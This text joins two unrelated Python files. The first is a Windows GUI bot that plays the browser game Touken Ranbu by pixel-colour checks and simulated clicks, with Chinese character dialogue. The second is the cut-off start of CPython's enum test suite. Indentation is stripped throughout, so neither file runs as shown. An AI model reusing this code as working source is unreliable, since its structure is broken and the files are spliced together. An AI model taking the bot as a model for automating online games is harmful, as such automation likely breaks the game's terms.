MIN_CHAT = ["又是5分钟。", "嗯,5分钟过去了。还要继续呢!",
"就以5分钟为一步,慢慢走下去吧!",
"可能5分钟也算不了什么啦。", "每个5分钟都很重要哦!",
"按照5分钟-7分钟-5分钟来报时如何?", "休息5分钟似乎也不错!", "大概5分钟过去了呢。"]
# 每次运行中log输出小概率夹杂
ON_CHAT = ["兼桑没有惹出什么问题就好……", "顺便一提,兼桑还精神吗?", "对了,兼桑没有偷懒吧?", "啊,兼桑似乎新咏了一句!",
"任务的安排也要适度,出现负伤者就不好了。", "就照这个劲头干下去吧!", "要洗的衣服堆起来了……",
"去二十四节气景趣休息一下如何?", "大广间景趣真是华丽呀……有点不习惯呢!", "接下来要去活动吗?",
"挖山……真是不容易呀!", "就用邪道的方式走下去吧!", "今天的演练有参加吗?", "今天也要找检非吗?",
"要不要去函馆转换下心情?", "兼桑……嘿嘿。"]
# 选图时的聊天
BATTLE_CHAT = [["是老地方呢,……走吧,去那个战场。", "这个地方……真是怀念呢!", "收集立绘吗?不要太过火哦。", "这里,资源并没有很多呢。"],
["Boss点,这次要不要去呢……", "要小心敌太刀哦。", "要小心敌大太刀哦。", "回收依赖札就交给我吧!"],
["是关原呢,亲眼看到那场战役!", "玉钢和依赖札,一定带回来!", "木炭和玉钢,捡哪个好些呢?", "织田大人的安土,有缘的刀很多呢!"],
["就去捡些依赖札吧!", "是要回收砥石吗?", "了解。是要去收集什么资源呢?", "是冷却材?还是三日月大人呢?"],
["为了小乌丸大人,一起加油吧!", "虽然木炭很多,但是敌远程……", "不要午,不要午……", "厚樫山……没什么能说的了呢。"],
["京都的市中,努力不要迷路吧!", "在三条大桥上开辟出道路吧!", "好啦……公务搜查!", "一定要……守护那些人们的历史!"],
["希望能不要迷路直驱Boss点呢。", "能无伤突破就好了!", "但愿能尽可能减轻损伤……", "编成合适,这里会成为最简单的地图呢!"],
["就用远程来攻克这里吧!", "是要提高练度吗?要小心负伤哦!", "", ""]]
# 结束脚本时特殊对话
# 从1个开始,根据输出过的5min log数量决定特殊对话。计数最多50。
min_count = 0
END_CHAT_0 = ["下一个!", "接下来要做什么呢?", "继续下一环节吧!"]
END_CHAT_1 = ["主人也稍作整顿如何?", "稍做整顿,为下个任务打起精神!"]
END_CHAT_2 = ["大家辛苦了!", "长时间出勤辛苦了!"]
DIRECTORY = './kns/'
FOLD = '.py'
t1 = threading.Thread()
t2 = threading.Thread()
# ITSNAME = "计算器"
# ITSNAME="ToukenBrowser"
# ITSNAME="刀剣乱舞-ONLINE- - DMM GAMES - Google Chrome"
ITSNAME = "ToukenBrowserChromeWindow"
hwnd = 0
hwndDCf = 0
on_run = False
"""
窗体定义
"""
root = tkinter.Tk()
root.title("hori-kun" + random.choice(TITLELIST))
root.geometry("800x600")
root.configure(bg='#2A3260')
root.resizable(width=False, height=False)
"""
模块2:log
"""
scrl2 = tkinter.Scrollbar(root)
scrl2.place(x=10, y=405, width=635, height=185)
text2 = tkinter.Text(root, bg='white', fg='dimgray', font=("等线", 14), yscrollcommand=scrl2.set)
text2.place(x=10, y=405, width=615, height=185)
def log(result):
text2.insert(tkinter.END,
# time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))
time.strftime('%m-%d %H:%M:%S', time.localtime(time.time()))
+ " " + result + '\n')
text2.see(tkinter.END)
log("本程序不为使用脚本所造成的损失承担任何责任")
log("horikun 1.1.8 暂不支持在程序内编辑脚本")
scrl2['command'] = text2.yview
"""
模块1:选择子文件
"""
if not os.path.exists(DIRECTORY):
win32api.MessageBox(0, DIRECTORY + "目录缺失,请重新下载哦", "没有找到兼桑", win32con.MB_ICONWARNING)
sys.exit()
file_name = [os.path.splitext(name)[0] for name in os.listdir(DIRECTORY) if name.endswith(FOLD)]
scrl1 = tkinter.Scrollbar(root)
scrl1.place(x=10, y=10, width=185, height=385) #
list1 = tkinter.Listbox(root, bg='deepskyblue', fg='black', font=("等线", 16), selectmode=tkinter.BROWSE,
yscrollcommand=scrl1.set)
list1.place(x=10, y=10, width=165, height=385)
for item in file_name:
list1.insert(tkinter.END, item)
scrl1['command'] = list1.yview
def indexstr():
indexs = list1.curselection()
if len(indexs) == 0:
index = 0
else:
index = int(indexs[0])
return DIRECTORY + file_name[index] + FOLD
"""
核心功能
"""
def gethwnd():
global hwnd
global hwndDCf
win32gui.ReleaseDC(hwnd, hwndDCf)
hwnd = win32gui.FindWindow(None, ITSNAME)
while hwnd == 0:
log("等待获取%s窗口 ..." % ITSNAME)
time.sleep(3)
hwnd = win32gui.FindWindow(None, ITSNAME)
hwndDCf = win32gui.GetWindowDC(hwnd)
log("已获取窗口,句柄为%d" % hwnd)
# left, top, right, bottom = win32gui.GetWindowRect(hwnd)
def make_position(cx, cy):
# 模拟鼠标指针 传送到指定坐标
return win32api.MAKELONG(cx, cy)
def click_down(cx, cy):
win32api.SendMessage(hwnd, win32con.WM_LBUTTONDOWN, win32con.MK_LBUTTON, make_position(cx, cy)) # 模拟鼠标按下
def click_up(cx, cy):
win32api.SendMessage(hwnd, win32con.WM_LBUTTONUP, win32con.MK_LBUTTON, make_position(cx, cy)) # 模拟鼠标弹起
time.sleep(1e-2)
def click(cx, cy):
click_down(cx, cy)
click_up(cx, cy)
def wait(t):
time.sleep(t / 1000)
# win32gui.SetForegroundWindow(hwnd) # 这句可以把窗口拉到最前面来
def get_rgb(x, y):
rgba = win32gui.GetPixel(hwndDCf, x, y)
r = rgba & 255
g = (rgba >> 8) & 255
b = (rgba >> 16) & 255
# rgb = str(r) + ',' + str(g) + ',' + str(b)
rgb = [r, g, b]
return rgb
def check_rgb(x, y, rgb2):
rgb1 = get_rgb(x, y)
if_rgb = True
for i in range(3):
if_rgb &= rgb1[i] == rgb2[i]
return if_rgb
def check_rgb_rough(x, y, rgb2, err):
rgb1 = get_rgb(x, y)
if_rgb = True
for i in range(3):
if_rgb &= rgb1[i] - err <= rgb2[i] <= rgb1[i] + err
return if_rgb
"""
模块3:显示子文件代码
"""
scrl3 = tkinter.Scrollbar(root)
scrl3.place(x=205, y=10, width=585, height=385)
def disp_text(e=None):
global on_run
if not on_run:
with open(indexstr(), 'r', encoding='utf-8') as f:
content = f.read()
text3.configure(state='normal')
text3.delete(0.0, tkinter.END)
text3.insert(tkinter.INSERT, content)
text3.configure(state='disabled')
list1.bind('<<ListboxSelect>>', disp_text)
text3 = tkinter.Text(root, bg='white', fg='dimgray', font=("等线", 14), yscrollcommand=scrl3.set)
text3.place(x=205, y=10, width=565, height=385)
text3.insert(tkinter.END, "Hello world!")
scrl3['command'] = text3.yview
disp_text()
"""
模块4:开始/停止按键
"""
def _async_raise(tid, exctype):
tid = ctypes.c_long(tid)
if not inspect.isclass(exctype):
exctype = type(exctype)
res = ctypes.pythonapi.PyThreadState_SetAsyncExc(tid, ctypes.py_object(exctype))
if res == 0:
raise ValueError("invalid thread id")
elif res != 1:
ctypes.pythonapi.PyThreadState_SetAsyncExc(tid, None)
raise SystemError("PyThreadState_SetAsyncExc failed")
def stop_thread(thread):
_async_raise(thread.ident, SystemExit)
def endscript(errmsg='None'):
global t1
global t2
global on_run
on_run = False
stop_thread(t2)
log("结束运行。" + choose_end_chat(min_count))
button4.configure(text="执行\n脚本")
if not errmsg == 'None':
# 在这里添加新的异常结束情况弹窗
if errmsg == 'gb':
win32api.MessageBox(0, "队内男士的特上刀装损坏了", "金蛋掉了!", win32con.MB_ICONWARNING)
elif errmsg.find('inj') >= 0:
if errmsg == 'inj0':
win32api.MessageBox(0, "出现重伤了", "负伤了!", win32con.MB_ICONWARNING)
elif errmsg == 'inj1':
win32api.MessageBox(0, "出现中伤以上伤员了", "负伤了!", win32con.MB_ICONWARNING)
else:
win32api.MessageBox(0, "出现轻伤以上伤员了", "负伤了!", win32con.MB_ICONWARNING)
elif errmsg == 'lim':
win32api.MessageBox(0, "出阵结束", "结束啦!", win32con.MB_ICONASTERISK)
else:
win32api.MessageBox(0, "未定义的结束情况", "怎么回事?", win32con.MB_ICONHAND)
disp_text()
stop_thread(t1)
def on_button():
global on_run
global min_count
global t1
global t2
if on_run:
endscript()
else:
on_run = True
t1 = threading.Thread(target=go_run)
t1.setDaemon(True)
t1.start()
t2 = threading.Thread(target=log_rep)
t2.setDaemon(True)
t2.start()
button4.configure(text="停止\n脚本")
log("开始运行。")
min_count = 0
def go_run():
global min_count
init_params()
gethwnd()
try:
exec(open(indexstr(), encoding='utf-8').read())
except(Exception, ArithmeticError, IOError, OSError, WindowsError, RuntimeError):
win32api.MessageBox(0, "脚本代码错误,请再编辑", "出错了!", win32con.MB_ICONWARNING)
root.destroy()
win32gui.ReleaseDC(hwnd, hwndDCf)
sys.exit()
endscript()
def log_rep():
while 1:
time.sleep(300)
if random.randint(0, 9) < 7:
log(MIN_CHAT[-1])
elif random.randint(0, 3):
log(random.choice(MIN_CHAT[0:-1]))
else:
log(random.choice(ON_CHAT))
global min_count
if min_count <= 50:
min_count += 1
def choose_end_chat(count):
if count == 0:
return ""
elif count < 10:
return random.choice(END_CHAT_0)
elif count < 40:
return random.choice(END_CHAT_1)
else:
return random.choice(END_CHAT_2)
button4 = tkinter.Button(root, bg='maroon', fg='white', activebackground='crimson',
font=("华文行楷", 40), text="执行\n脚本", command=on_button)
button4.place(x=655, y=405, width=135, height=185)
# </editor-fold>
# <editor-fold desc="kanesan: 用来给horikun提供支持的功能函数库">
# ---------------------------通用-----------------------------------------------
last_map = False # 出阵界面默认的出阵图,是否已经固定为上次出阵时的目的地(已不用选择时代)
"""
改变刀装检测逻辑。
在出阵之前,标定18个刀装位中哪些是金,哪些是银。
在出阵中,不再对种类二次检查。检查这些刀装位上的刀装耐久度:
如果耐久还在预期值以上(0作为最低边的一个像素判断),就继续打;
耐久度不够,就正常返回开始下一轮;
耐久掉到0(只要有在检查刀装耐久,就会查有没有掉刀装),当作掉刀装异常情况,中断脚本。
"""
checked_balls = False # 是否已经获取了一遍金蛋位置
battles = 0 # 已经出阵过的次数
pos_balls = [] # 这个位置上是什么刀装
def init_params():
"""
每次按红色按钮启动脚本时,对global变量进行初始化
"""
global last_map
global checked_balls
global battles
global pos_balls
last_map = False
checked_balls = False
battles = 0
for i in range(6):
pos_balls.append([0, 0, 0])
def d(x, y):
# 测试用
print(str(int(x / 2)) + ", " + str(int(y / 2)))
def f(x):
strrr = ''
for i in range(len(x)):
strrr += str(int(x[i] / 2)) + ', '
print(strrr[0:-2])
def if_in_home():
# 当前是否在本丸
return (check_rgb(45, 47, [4, 124, 58]) and
check_rgb(69, 567, [234, 227, 175]) and
check_rgb(584, 43, [162, 27, 36]))
def if_in_battle_select():
# 当前是否在选图界面(普图、活动图皆有可能)
return (check_rgb(48, 192, [172, 20, 20]) and
check_rgb(273, 91, [238, 221, 187]) and
check_rgb(677, 103, [228, 224, 194]))
def if_in_group_select():
# 当前是否在选择部队界面
return (check_rgb(827, 124, [120, 214, 216]) and
check_rgb(28, 241, [98, 11, 11]) and
check_rgb(651, 160, [0, 53, 134]))
def if_in_formation_select():
# 当前是否在选择队形界面
return (check_rgb(175, 70, [198, 23, 23]) and
check_rgb(233, 213, [80, 179, 14]) and
check_rgb(549, 391, [192, 100, 54]))
def if_in_battle_count():
# 当前是否在战斗结束后结算界面
return (check_rgb(30, 95, [33, 200, 25]) and
check_rgb(553, 30, [126, 4, 8]) and
check_rgb(64, 143, [65, 7, 17]))
def if_in_next_point():
# 当前是否在可以进军的界面
return (check_rgb(32, 136, [255, 255, 255]) and
check_rgb(51, 82, [36, 171, 22]) and
check_rgb(818, 473, [255, 255, 255]))
# --------------------------------------------------------------------------------------------------待改-------------------------
def if_inj_gb(gb_life=0):
"""
在可以进军的界面,检查金蛋耐久度是否在允许值以下
参数:耐久占比到这个数以下时就要回城,0~1的浮点数,0为禁用。
保守值为0.25几乎不会再掉刀装,
也可以取0.15,降低掉远程刀装的概率
"""
if_injed_gb = False
if gb_life:
for j in range(3):
# gb_life为0时,该检查规则仍有效
check_x = int(gb_life_X_START[j] + gb_life * (gb_life_X_END[j] - gb_life_X_START[j]))
for i in range(6):
if pos_balls[i][j] and check_rgb(check_x, gb_life_Y[i], gb_life_RGB):
if_injed_gb = True
return if_injed_gb
def if_drop_gb():
# 在可以进军的界面,检查是否比起出阵时少了金蛋。这个函数现在是上者的特殊情况。
if_dropped_gb = False
gb_life=0
for j in range(3):
# gb_life为0时,该检查规则仍有效
check_x = int(gb_life_X_START[j] + gb_life * (gb_life_X_END[j] - gb_life_X_START[j]))
for i in range(6):
if pos_balls[i][j] and check_rgb(check_x, gb_life_Y[i], gb_life_RGB):
if_dropped_gb = True
return if_dropped_gb
def if_injure(injury=0):
"""
在可以进军的界面,检查是否有队员负伤
参数:
injury,0-仅重伤,1-中伤以上,2-轻伤以上
"""
if_injured = False
for i in range(6):
for j in range(injury + 1):
if_injured |= check_rgb_rough(MARCH_INJ_X, MARCH_INJ_Y[i], MARCH_INJ_RGB[j], MARCH_INJ_ERR)
return if_injured
def enter_battle_face():
"""
从本丸进入出阵远征演练界面(函数):
点击右上调出菜单
点击出阵按钮
等待,直到加载出出阵/远征/演练画面
"""
click(960, 34)
wait(500)
click(987, 122)
wait(800)
while not if_in_battle_face():
click(960, 34)
wait(500)
click(987, 122)
wait(800)
# 临出阵前检查刀装位置
ENTER_GB_X = [301, 422, 541]
ENTER_GB_Y = [134, 204, 274, 343, 413, 483]
ENTER_GB_RGB_1 = [255, 215, 94] # 金刀装
ENTER_GB_RGB_2 = [162, 170, 178] # 银刀装
ENTER_GB_RGB_3 = [134, 187, 172] # 绿刀装
ENTER_GB_ERR = 20
# 临进军前检查刀装耐久
gb_life_X_START = [385, 438, 490]
gb_life_X_END = [424, 476, 529]
gb_life_Y = [188, 256, 324, 392, 460, 528]
gb_life_RGB = [102, 54, 3] # 这个地方因为不是贴图,所以不用设置模糊的ERR
# 临进军前检查负伤情况
MARCH_INJ_X = 208
MARCH_INJ_Y = [137, 205, 273, 341, 409, 477]
MARCH_INJ_RGB = [[239, 0, 0], [255, 119, 0], [239, 204, 0]] # 重,中,低
MARCH_INJ_ERR = 30 # 10似乎就够了?
def check_gb(check_balls):
"""
出门前检查带了多少刀装
"""
global pos_balls
# 切换两下,浏览刀装
while not check_rgb(326, 360,[244, 236, 188]):
click(152, 93)
wait(800)
# 记录各位置上是否有金蛋
str_gb = ""
for i in range(6):
str_gb += "\n队员" + str(i + 1) + ": ["
for j in range(3):
if check_rgb_rough(ENTER_GB_X[j], ENTER_GB_Y[i], ENTER_GB_RGB_1, ENTER_GB_ERR):
pos_balls[i][j] = 1
str_gb += " 金 "
elif check_rgb_rough(ENTER_GB_X[j], ENTER_GB_Y[i], ENTER_GB_RGB_2, ENTER_GB_ERR):
pos_balls[i][j] = 2
str_gb += " 银 "
elif check_rgb_rough(ENTER_GB_X[j], ENTER_GB_Y[i], ENTER_GB_RGB_3, ENTER_GB_ERR):
pos_balls[i][j] = 3
str_gb += " 绿 "
else:
str_gb += " 无 "
str_gb += "]"
log("正常刀装情况如下:" + str_gb)
# 然后,为了之后不对多余的刀装进行判断,根据“需要检查的刀装内容”滤除检查位。
for i in range(6):
for j in range(3):
if check_balls<pos_balls[i][j]:
pos_balls[i][j]=0
# 最后,pos_balls里剩下的非零位就是需要检查的刀装位置。
def enter_battle_map(check_balls):
"""
决定出阵这个地图(函数):
点击右下选队按钮
等待部队加载
(跳过刀装/伤势确认)
记录出阵前有着金刀装的位置
点击右下出阵按钮
点击确认“队伍等级超过,是否还要出阵”
"""
global checked_balls
click(888, 537)
wait(500)
while not if_in_group_select():
wait(500)
wait(500)
click(151, 91)
wait(500)
if not checked_balls:
check_gb(check_balls)
checked_balls = True
click(899, 502) # 点击出阵
wait(1000)
click(408, 378) # 点掉超等级提示
wait(500)
def enter_battle_map_hanafubuki(change=False):
"""
刷花时的,决定出阵这个地图。
点击右下选队按钮
等待部队加载
卸刀装,换刀(重点)
点击右下出阵按钮
点击确认“队伍等级超过,是否还要出阵”
"""
click(888, 537)
wait(500)
while not if_in_group_select():
wait(500)
wait(500)
# 刷花脚本不检查金刀装。
if change:
# 进入队长的刀装界面
click(658, 145)
while not check_rgb(571, 31, [124, 81, 44]):
wait(500)
# 一键解除刀装
click(494, 548)
while not check_rgb(288, 195, [233, 227, 197]):
wait(500)
# 随便点外面哪个地方,退出刀装界面
click(865, 170)
wait(800)
# 换人
click(570, 152)
while not check_rgb(351, 99, [114, 111, 0]):
wait(500)
# 激活filter
click(176, 556)
wait(500)
# 选择“有刀装的”
click(244, 445)
wait(500)
# 应用filter
click(785, 451)
wait(800)
# 选择第一个
if check_rgb(436, 119, [136, 128, 31]):
endscript('lim')
else:
click(939, 141)
while not check_rgb(367, 102, [233, 222, 187]):
wait(500)
wait(500)
click(899, 502) # 点击出阵
wait(1000)
click(408, 378) # 点掉超等级提示
wait(500)
# 预定义 各阵型对应的判断有利/不利位置
FORMATIONS = [[178, 183], # 各个阵型对应的坐标
[428, 183],
[676, 183],
[178, 357],
[428, 357],
[676, 357]]
FORMATION_GOOD = [219, 2, 2] # 注意当k为有利阵型时,敌阵型是k+1
FORMATION_BAD = [2, 119, 218] # 这个大概用不到
# 阵型编号 0~5
def manual_formation(form_blind, if_enemy=None, then_mine=None):
"""
手动选择阵型(函数:盲选的阵型,特殊情况的敌阵型、我阵型)
# 提供特殊情况下的手选
若优势阵型代表的是特殊情况
则选择特殊答案
若其余五个阵型中某一个阵型为优势
则选择那个优势的
其他(侦察失败)
则选择盲选的
"""
enemy = form_blind + 1
for i in range(6):
if check_rgb(FORMATIONS[i][0], FORMATIONS[i][1], FORMATION_GOOD):
enemy = i + 1
break
if enemy >= 6:
enemy -= 6
if enemy == if_enemy or enemy - 6 == if_enemy:
click(FORMATIONS[then_mine][0], FORMATIONS[then_mine][1])
else:
click(FORMATIONS[enemy - 1][0], FORMATIONS[enemy - 1][1])
# -------------------------一般出阵---------------------------------------------
def if_in_battle_face():
# 当前是否在一般出阵界面
return (check_rgb(172, 96, [183, 227, 254]) and
check_rgb(425, 69, [61, 115, 210]) and
check_rgb(166, 546, [142, 186, 66]))
def if_in_battle_normal():
# if_in_battle_select的前提下,当前是否在普图界面
return ((check_rgb(369, 126, [140, 0, 0]) or check_rgb(306, 128, [140, 0, 0])) and
check_rgb(996, 533, [0, 52, 134]) and
check_rgb(244, 276, [190, 0, 0]))
def if_in_KBC():
# 当前是否遭遇检非
return (check_rgb(320, 109, [8, 254, 236]) and
check_rgb(329, 305, [24, 96, 102]) and
check_rgb(767, 107, [4, 44, 255]))
def enter_battle_select():
"""
从本丸进入普图界面(函数):
从本丸进入选择出阵界面(函数)
选择“出阵”
等待,直到加载出选图画面
如果跑到活动图去了,往前一级回到普图选图界面
"""
enter_battle_face()
click(546, 225)
wait(500)
while not if_in_battle_select():
wait(500)
if not if_in_battle_normal():
click(137, 93)
wait(500)
def which_map():
"""
在普图选图界面,判断现在选中的是哪个时代
每个图的判据都是独特的,顺序可根据需求重排
1: check_rgb(597, 510,[84,83,69])
2: check_rgb(525, 553,[0,0,0])
3: check_rgb(688, 534,[10,10,8])
4: check_rgb(482, 497,[104,101,85])
5: check_rgb(179, 568,[32,31,26])
6: check_rgb(780, 525,[0,0,0])
7: check_rgb(702, 500,[0,0,0])
8: check_rgb(544, 561,[0,0,0])
"""
if check_rgb(524, 569, [43, 40, 37]):
current_map = 5
elif check_rgb(558, 560, [0, 0, 0]):
current_map = 8
elif check_rgb(597, 508, [1, 1, 1]):
current_map = 1
elif check_rgb(135, 533, [84, 83, 74]):
current_map = 4
elif check_rgb(434, 509, [16, 15, 12]):
current_map = 3
elif check_rgb(526, 549, [2, 2, 2]):
current_map = 2
elif check_rgb(631, 545, [0, 0, 0]):
current_map = 7
else: # (780, 524 ,[0, 0, 0])
current_map = 6
log("当前光标所指时代为 " + str(current_map) + "图")
return current_map
# 普图一个时代四个图的选择点
MAP4 = [[673, 342], [905, 349], [663, 445], [880, 443]]
# 是否已在上次出阵时留下选图记录
def map_select(m, n, la_map=False):
"""
普图选地图(函数:要选择的那个图是m-n)
若还没定义上次的出阵先:
判断当前所在大战场是m图(进入判断战场部分)
若m不对
点击左右箭头对应次数,让m对上
(无等待)点击对应的n
"""
if not la_map:
delta_map = m - which_map()
if delta_map >= 0: # 目标图号>当前所指图号
for i in range(delta_map):
for j in range(30):
if check_rgb(705 + 10 * j, 215, [255, 255, 255]):
click(705 + 10 * j, 215)
break
wait(500)
else:
for i in range(-delta_map):
click(109, 217)
wait(500)
click(MAP4[n - 1][0], MAP4[n - 1][1])
wait(500)
def go_battle_simple(m, n, middle=None, injury=0, limit=0, check_balls=0, gb_life=0):
"""
从本丸或者战中的任何一个点开始,进入无脑loop的循环
参数:
m : 1~8 的整数,出阵的时代
n : 1~4 的整数,出阵的具体地图
middle : 形如[x,y,[r,g,b]]的数组, 当满足这个颜色条件的时候,说明该中途回城了
injure : 0-重,1-中,2-轻的整数,中止脚本所需伤势
limit : 最大出阵次数,刷花时设成3就行。
check_balls : 0为不管刀装,1为只判断金刀装耐久,2为金银都判断,3为金银绿。
gb_life : 0~1的浮点数,刀装的耐久度小于这个比率时就该回城了。如果check_balls为0,该参数设置无效。
"""
global last_map
global battles
if if_in_home():
# 在本丸内
if limit and battles >= limit:
endscript('lim') # 结束,并告知是因为到达出阵上限退出的
enter_battle_select()
map_select(m, n, last_map)
enter_battle_map(check_balls)
battles += 1
if not last_map:
log(BATTLE_CHAT[m - 1][n - 1])
last_map = True
else:
log("出阵 × " + str(battles))
elif if_in_next_point():
# 到了该进军的时候
if_mid = False
if middle:
if_mid = check_rgb(middle[0], middle[1], middle[2]) # 是否到该回城的预设点
if_dropped_gb = if_drop_gb()
if_injed_gb = if_inj_gb(gb_life)
if_injured = if_injure(injury)
if if_mid or if_injed_gb or if_dropped_gb or if_injured: # 到地方了,要回城了
click(932, 440)
wait(500)
click(415, 377)
# 中途点回城 属正常情况
# 刀装低耐久度回城 属正常情况
if if_dropped_gb: # 掉金蛋必退出
endscript('gb') # 结束后告知是因为掉蛋而退出的
elif if_injured: # 负伤要看程度
endscript('inj' + str(injury))
wait(500)
click(631, 449)
else:
click(631, 157) # 没啥事的时候点上面,憋点下边,要不然可能误触进军
wait(1000)
def auto_hanafubuki(limit=3):
"""
全自动刷花。
基本结构如上,但有些许的modify。
"""
global last_map
global battles
auto_hanafubuki.change = False
if if_in_home():
# 在本丸内
if battles >= limit:
auto_hanafubuki.change = True
battles = 0
enter_battle_select()
map_select(1, 1, last_map)
enter_battle_map_hanafubuki(auto_hanafubuki.change)
auto_hanafubuki.change = False
battles += 1
if not last_map:
log("去恢复疲劳度吧!")
last_map = True
else:
log("出阵 × " + str(battles))
else:
# 刷花时不设置禁止进军的条件。
click(631, 449) # 无脑进军
wait(1000)
# -------------------------通用活动---------------------------------------------
def if_in_campaign_face(campaign_name):
# if_in_battle_select的前提下,当前是否在某个活动图界面
ifin = False
if campaign_name == "hanafuda":
ifin = (check_rgb(131, 139, [215, 64, 64]) and
check_rgb(388, 181, [255, 165, 188]) and
check_rgb(722, 178, [255, 208, 135]))
return ifin
def enter_campaign_face():
"""
从本丸进入活动图界面(函数):
若左侧活动菜单没调出来
点击左侧小三角调出活动菜单
点击活动banner
等待,直到加载出活动界面
若有4个地图:
点击所设定的地图
"""
click(109, 137)
wait(500)
click(109, 137)
wait(500)
# wait until hanafuda
while not if_in_campaign_face("hanafuda"):
wait(500)
click(482, 401)
wait(500)
def enter_campaign_map():
"""
决定出阵这个活动地图
"""
enter_battle_map(0)
# 这里采取花札的门票位置
click(504, 454)
wait(1000)
def fill_ticket():
"""
如果目前已经1个门票都没了,就回复1。不回复更多的了,我也怕浪费。
"""
if check_rgb(212, 223, [48, 32, 13]):
click(651, 213)
wait(500)
click(309, 373)
wait(500)
click(404, 367)
wait(500)
while not check_rgb(509, 369, [209, 0, 88]):
wait(500)
click(509, 367)
wait(500)
# --------------------------大阪城----------------------------------------------
def if_in_next_stage():
# (大阪城)当前是否在可以进入下一层的界面
pass
# ---------------------------花札-----------------------------------------------
def hanafuda_if_on_koikoi():
# 可以agari了
return (check_rgb(381, 151, [0, 114, 40]) and
check_rgb(663, 224, [0, 119, 45]) and
check_rgb(327, 284, [152, 77, 17]))
def hanafuda_if_on_select():
# 当前在花札内,可以选牌了
return (check_rgb(264, 25, [155, 153, 135]) and
check_rgb(935, 455, [134, 0, 0]) and
check_rgb(942, 196, [85, 76, 41]))
def hanafuda_if_finish():
# 当前花札已经跑完,该选牌回家了
return (check_rgb(228, 20, [123, 39, 37]) and
check_rgb(735, 377, [26, 22, 18]) and
check_rgb(1011, 77, [197, 163, 114]))
def hanafuda_if_finish_count():
# 选完牌,结算完奖励,真该回家了
return (check_rgb(571, 93, [38, 10, 5]) and
check_rgb(892, 108, [91, 75, 57]) and
check_rgb(919, 462, [134, 0, 0]))
"""
用来判断各种役的绿边位置。存储位置为该役的[y, x1,x2,...]
HANAFUDA_KOU =[461, 26,56,86,116,146] # 五光,基础分5
HANAFUDA_TANN=[530, 225,255,285,315,345,375] # タン,基础分2
HANAFUDA_TANE=[530, 515,545,575,605,635,665] # タネ,基础分2
HANAFUDA_KASU=[530, 704,734,764,794,834,854,884,914,944,974,1004] # カス,基础分1
# 以下特殊组合加分均为2
HANAFUDA_HANA=[461, 414,444] # 月见酒
HANAFUDA_TUKI=[461, 484,514] # 花见酒
HANAFUDA_AKAN=[530, 26,56,86] # 赤短
HANAFUDA_AOTN=[530, 126,156,186] # 青短
HANAFUDA_SISI=[530, 415,445,475] # 猪鹿蝶
# 若在以上组合中取到了末尾的坐标,则直接加分5
常量按照分数区别定义如下:[score, y, [x1,x2,...,xn]]
"""
HANAFUDA_SCORE = [[5, 461, [26, 56, 86, 116, 146]],
[2, 530, [225, 255, 285, 315, 345, 375]],
[2, 530, [515, 545, 575, 605, 635, 665]],
[1, 530, [704, 734, 764, 794, 834, 854, 884, 914, 944, 974, 1004]],
[2, 461, [414, 444]],
[2, 461, [484, 514]],
[2, 530, [26, 56, 86]],
[2, 530, [126, 156, 186]],
[2, 530, [415, 445, 475]]]
HANAFUDA_GREEN = [102, 242, 47] # 绿色边的主色,如果取得太靠边就不是这个颜色了
def hanafuda_level():
"""
光标已经移到花札上时,通过底边栏判断花札选择优先级
"""
score = 0
for i in range(len(HANAFUDA_SCORE)):
if check_rgb_rough(HANAFUDA_SCORE[i][2][len(HANAFUDA_SCORE[i][2]) - 1],
HANAFUDA_SCORE[i][1],
HANAFUDA_GREEN, 20):
score += HANAFUDA_SCORE[i][0] + 5
continue
for j in reversed(range(len(HANAFUDA_SCORE[i][2]) - 1)):
if check_rgb_rough(HANAFUDA_SCORE[i][2][j],
HANAFUDA_SCORE[i][1],
HANAFUDA_GREEN, 20):
score += HANAFUDA_SCORE[i][0]
break
return score
HANAFUDA_X = [312, 436, 542, 656]
HANAFUDA_Y = [200, 410]
def hanafuda_select():
# 当面前摆着两张或三张花札时,选择一张
sum_score = [0, 0, 0, 0]
for i in range(4):
cx = HANAFUDA_X[i]
click_down(cx, HANAFUDA_Y[0]) # 假点击。在牌面点击,
wait(300)
sum_score[i] = hanafuda_level() # 趁机用底边绿边算分数,
wait(300)
click_up(cx, HANAFUDA_Y[1]) # 在另一个地方抬起,模拟鼠标“移动”
wait(300)
x = sum_score.index(max(sum_score)) # 选择得分最高的卡,
click(HANAFUDA_X[x], HANAFUDA_Y[0]) # 点它
wait(500)
click(HANAFUDA_X[x], HANAFUDA_Y[0]) # 以防抬起失败,做双击处理
def go_hanafuda_simple():
"""
从本丸开始,进入loop
"""
if if_in_home():
enter_campaign_face()
fill_ticket() # 虚拟伤害,保持总有一张门票可以用
enter_campaign_map()
# 这里就进入了花札地图。
elif hanafuda_if_on_koikoi():
# 如果koikoi就它,如果只有agari就它
click(552, 208)
wait(500)
click(552, 208)
wait(500)
elif hanafuda_if_on_select():
wait(2000)
hanafuda_select()
wait(500)
elif hanafuda_if_finish():
# 如果一圈跑完了,怎么进行后续操作(直到回到本丸/继续出击)
# 先选5张牌
wait(1000)
for i in range(5):
click(160 + i * 140, 200)
wait(500)
while not hanafuda_if_finish_count():
click(634, 482)
wait(800)
click(919, 450)
wait(5000)
else:
# 无脑点进军
for i in range(3):
click(634, 482)
wait(800)
# ------------------------------------------kanesan 结束------------------------------------------
# </editor-fold>
"""
开始主循环
"""
root.mainloop()
|
test_enum.py
|
import enum
import inspect
import pydoc
import sys
import unittest
import sys
import threading
from collections import OrderedDict
from enum import Enum, IntEnum, EnumMeta, Flag, IntFlag, unique, auto
from io import StringIO
from pickle import dumps, loads, PicklingError, HIGHEST_PROTOCOL
from test import support
from datetime import timedelta
try:
import threading
except ImportError:
threading = None
# for pickle tests
try:
class Stooges(Enum):
LARRY = 1
CURLY = 2
MOE = 3
except Exception as exc:
Stooges = exc
try:
class IntStooges(int, Enum):
LARRY = 1
CURLY = 2
MOE = 3
except Exception as exc:
IntStooges = exc
try:
class FloatStooges(float, Enum):
LARRY = 1.39
CURLY = 2.72
MOE = 3.142596
except Exception as exc:
FloatStooges = exc
try:
class FlagStooges(Flag):
LARRY = 1
CURLY = 2
MOE = 3
except Exception as exc:
FlagStooges = exc
# for pickle test and subclass tests
try:
class StrEnum(str, Enum):
'accepts only string values'
class Name(StrEnum):
BDFL = 'Guido van Rossum'
FLUFL = 'Barry Warsaw'
except Exception as exc:
Name = exc
try:
Question = Enum('Question', 'who what when where why', module=__name__)
except Exception as exc:
Question = exc
try:
Answer = Enum('Answer', 'him this then there because')
except Exception as exc:
Answer = exc
try:
Theory = Enum('Theory', 'rule law supposition', qualname='spanish_inquisition')
except Exception as exc:
Theory = exc
# for doctests
try:
class Fruit(Enum):
TOMATO = 1
